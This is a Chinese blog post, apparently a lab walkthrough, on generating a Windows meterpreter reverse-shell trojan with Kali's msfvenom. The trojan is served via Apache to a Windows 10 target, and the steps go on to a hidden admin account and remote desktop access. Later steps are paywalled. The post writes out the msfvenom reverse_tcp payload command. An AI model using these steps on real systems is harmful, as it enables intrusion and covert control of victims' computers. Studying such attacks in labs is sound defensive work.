2021-12-09 使用kali生成木马,渗透Windows系统

最新推荐文章于 2025-04-03 02:29:27 发布
最新推荐文章于 2025-04-03 02:29:27 发布
阅读量1.5w 收藏 203
点赞数 27
分类专栏: 其他 文章标签: windows 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_58489132/article/details/121816285
版权
本文详细介绍了如何使用Kali Linux中的Metasploit框架生成木马,并通过Apache服务部署到Web服务器,诱导Windows 10靶机下载执行,最终实现对靶机的远程控制。实验步骤包括生成木马、开启服务、设置攻击模块、渗透及验证等关键环节。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本文章仅供学习和参考!

欢迎交流~

目录

一、实验题目:使用kali生成木马,渗透Windows系统

二、实验内容:

        使用kali中的Metasploit生成木马,控制Windows系统

三、实验环境:

1. 攻击者IP(kali):192.168.112.130

2. 靶机IP(Windows10):192.168.112.136

三、实验步骤:

1. 保证两个系统能相互ping通

2. 生成木马,在kali打开终端,输入以下命令:

3. 进入木马文件存放路径,将木马文件evilshell.exe复制到 /var/www/html,输入命令:

4. 进入目录 /var/www/html,将html目录下的其余文件删除,输入命令:

5. 开启apache服务,输入命令:

     可用以下命令查看服务开启状态:

6. 在Windows10靶机上打开浏览器,输入kali的IP,访问kali并下载木马文件evilshell.exe

7. 开启postgresql服务,其端口号为5432,输入命令:

     可用以下命令查看服务开启状态:

8. 查看端口,输入命令:

9. 开启msfconsole,输入命令:

10.设置攻击模块并运行,输入命令:

11. 在靶机中双击运行木马文件(evilshell.exe)

12. 获取目标主机shell,输入命令:

     若出现乱码现象,可输入命令:

13. 输入ipconfig,查看靶机的IP地址:

14. 在靶机中添加一个隐藏用户(后面加$),并提升隐藏用户的权限,输入以下命令:

15. kali打开一个新的终端,使用远程桌面连接靶机(靶机需要开启远程连接服务),输入命令:

16. 使用 host$/密码 登录靶机,登录成功后,使用管理员权限打开cmd,添加一个新用户,添加成功则证明渗透成功!

一、实验题目:使用kali生成木马,渗透Windows系统

二、实验内容:

        使用kali中的Metasploit生成木马,控制Windows系统

三、实验环境:

1. 攻击者IP(kali):192.168.112.130

2. 靶机IP(Windows10):192.168.112.136

三、实验步骤:

1. 保证两个系统能相互ping通

2. 生成木马,在kali打开终端,输入以下命令:

 msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击者IP lport=监听端口 -f 后门文件类型 >/后门文件存放路径/evilshell.exe

3. 进入木马文件存放路径,将木马文件evilshell.exe复制到 /var/www/html,输入命令:

cp evilshell.exe /var/www/html

4. 进入目录 /var/www/html,将html目录下的其余文件删除,输入命令:

rm 文件1 文件2 ... 文件n

5. 开启apache服务,输入命令:

/etc/init.d/apache2 start

     可用以下命令查看服务开启状态:

/etc/init.d/apache2 status

6. 在Windows10靶机上打开浏览器,输入kali的IP,访问kali并下载木马文件evilshell.exe

      将文件下载到桌面,方便测试:

7. 开启postgresql服务,其端口号为5432,输入命令:

最低0.47元/天 解锁文章
Kali2022 如何生成M马,渗透Windows 10
本博客,博文仅代表个人操作经验,不能完全解决你的问题,仅供参考,佛系回复。
05-04 710
1.攻击者IP:192.168.1.35系统: KALI2022(vmware 16.0)2.靶机IP:192.168.1.16系统: Windows103.USB无线网卡。
靶机测试,kali生成windows木马程序
2301_76361674的博客
05-03 1523
仅用于靶机测试!永恒之蓝:通过系统已有漏洞进行攻击,获得后门权限木马:通过将后门放到靶机上,获得权限。
kali入门到入狱之 生成木马程序的利用.
网络安全领域___专研者.
03-17 4740
当您忍不住点击一个(美女图片)或(帅哥图片)的时候,或者是您安装一个了来路不明的程序程序时,再或者是您随意点击了一个链接后,可能您的设备已经沦陷了.
利用kali制作一个简易木马来控制主机
最新发布
wrjhs的博客
04-03 402
生成木马文件后,先将主机的杀毒软件关了,确保病毒文件进入主机不会被杀毒软件杀掉。我们发现还需要lhost 和lport两个参数,这两个参数就是我们kali的ip和端口,这个端口要与之前成木马文件时的端口一致。端口可以随便选,但要记住,后面会用到。攻击机的ip,也就是kali的ip,可以通过这个命令来查看。Metasploit命令实在太多,具体的可以去百度搜索,这里就介绍一些有趣的。在将木马文件拖进主机后,我们就可以开启监听了,利用下面的命令。监听成功之后,就可以执行一些命令,例如,与摄像头相关的。
Kali生成windows木马程序
热门推荐
qq_51950323的博客
09-07 1万+
此文章为kali生成windows木马程序,进行的后渗透测试。此操作仅供虚拟机测试,请勿使用于非法途径。
使用Kali Linux系统生成木马病毒并实现远程控制计算机
2401_84578953的博客
09-21 2518
木马生成木马病毒并实现远程控制计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码通常有控制端和被控制端两个可执行程序。它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至还可以远程操控被种者的电脑。我将会详细的介绍使用Kali Linux系统生成木马,并用它远程控制一台处在外网的物理计算机。**使用工具**VMware Workstation Pro 16(虚拟机)Kali Linux 2021系统
复现|使用Kali生成木马渗透Windows系统
Maricopig的博客
05-13 3273
简单复现了使用kali中的msfvenom工具生成木马文件,并在靶机中执行后,展示后渗透阶段可操作内容。
新手级,使用KALI生成木马获取目标电脑权限(关闭防火墙和杀毒后)
2403_87247171的博客
02-22 1143
最近在学习一些网安的知识和技术,并了解到Kali Linux这款操作系统,他是一款基于 Debian 的开源 Linux 发行版,专门用于数字取证和渗透测试。本教程只供大家学习探讨和交流,任何使用本教程内容去进行违法犯罪活动行为的一切后果,与本教程无关!注:本教程只供大家学习探讨和交流,任何使用本教程内容去进行违法犯罪活动行为的一切后果,与本教程无关!进入kali界面,随后输入kali的账号root和密码kali,进入kali的root操作界面。随后将这个IP填入刚刚的代码里,并回车运行,最后输入。
msf之msfvenom的使用使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 4450
msfvenom的使用
kali生成木马程序渗透linux系统
05-24
首先,需要使用 Kali Linux 上的一个名为 Metasploit 的工具来生成木马程序。Metasploit 是一款开源的渗透测试框架,可以用于创建、测试和部署漏洞利用。 其次,需要了解目标系统的漏洞情况,选择合适的漏洞利用...
kali生成木马
Massimo__JAVA的博客
04-25 2306
攻击机:kali 192.168.116.128受害机:win7 192.168.116.124目标:使用kali
网络安全技术新手入门:利用Kali Linux生成简单的远程控制木马
weixin_56154577的博客
01-08 7616
本文对木马生成过程讲的比较详细,适合对网络安全技术感兴趣的小伙伴们,读完本文之后,读者可以对木马的形成、传播、对靶机的控制流程有一个逻辑性的理解
kali木马入侵win7系统
皮卡乒的皮卡乓
06-19 2873
kali利用木马攻击win7
使用kali渗透工具msfvenom生成远控木马
m0_74981852的博客
06-04 3192
在杀毒软件中可以找回文件并信任改文件。右键复制到自己的电脑的一个位置,注意。1.打开kali终端>输入。2.1查看生成的后门文件。6.对目标主机进行攻击。运行之后,去目标主机。
网络安全--Kali渗透Windows
夜思红尘的博客
05-14 1410
Kali里的msfvenom木马制作工具是一个十分好用的工具,这篇文章主要讲述的就是这个msfvenom工具
Kali渗透Windows服务器
2301_77732591的博客
06-27 654
(2) 目标主机执行程序后,在kali终端中的检测程序会及时检测到。在检测到目标主机运行程序后,后门程序会反向连接到msf,之后msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。这个实验主要让我们学习漏洞扫描技术基本原理,了解其在网络攻防中的作用,掌握使用Kali中的Metasploit对目标主机渗透,并根据报告做出相应的防护措施。本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验步骤,详情如下;
Kali Linux使用Metasploit生成木马入侵安卓系统
简介
02-24 8676
前言,前言这是我最难想出来的对,这是我最后一篇文章,周一我们开学了,漏洞实战怕实现不了,至少放假可以更文章,我们只放一天,提示:以下是本篇文章正文内容,下面案例可供参考时间不够了,所以不做演示了,所以再见。
kali使用msf生成远控木马入侵windows(简单易懂,小白轻松上手)
保持进步,保持少年感
01-31 1140
kali使用msf生成远控木马入侵windows
评论 15
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值